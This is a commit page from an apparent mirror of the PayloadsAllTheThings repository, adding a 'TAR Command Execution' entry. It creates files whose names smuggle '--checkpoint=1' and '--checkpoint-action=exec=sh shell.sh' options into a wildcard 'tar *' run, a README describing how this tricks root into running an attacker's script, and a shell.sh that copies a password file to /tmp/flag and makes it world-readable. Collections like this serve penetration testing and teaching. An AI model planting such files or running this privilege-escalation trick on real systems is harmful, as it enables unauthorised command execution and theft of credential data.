ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Tar command exec

Browse Source
This commit is contained in:
swisskyrepo 2016-10-18 18:36:18 +07:00
parent 22b68979b4
commit bed3967509
5 changed files with 14 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -1,11 +1,9 @@
# Payloads All The Things # Payloads All The Things
A list of every usefull payloads and bypass for Web Application Security A list of usefull payloads and bypasses for Web Application Security
TODO: TODO:
* XSS * XSS
* Upload
* Traversal Directory * Traversal Directory
* Tar
* PHP Serialization * PHP Serialization
* CSV Injection * CSV Injection
@ -14,5 +12,7 @@ To improve:
* SQL injection * SQL injection
* XXE * XXE
* SSRF * SSRF
* Upload
* Tar command exec
# /!\ Work in Progress : 1% # /!\ Work in Progress : 1%

0
TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh Executable file
View File

0
TAR_Code_Exec/--checkpoint=1 Executable file
View File

14
TAR_Code_Exec/README.md
View File

@ -1,12 +1,14 @@
# Title # TAR Command Execution
Lorem By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and thats where the wildcard comes in handy.
## Vuln ## Exploit
These files work against a "tar *"
``` ```
Code --checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh (your exploit code is here)
``` ```
## Thanks to ## Thanks to
* Lorem *
* Ipsum

3
TAR_Code_Exec/shell.sh Executable file
View File

@ -0,0 +1,3 @@
#!/bin/bash
cat /passwd > /tmp/flag
chmod 777 /tmp/flag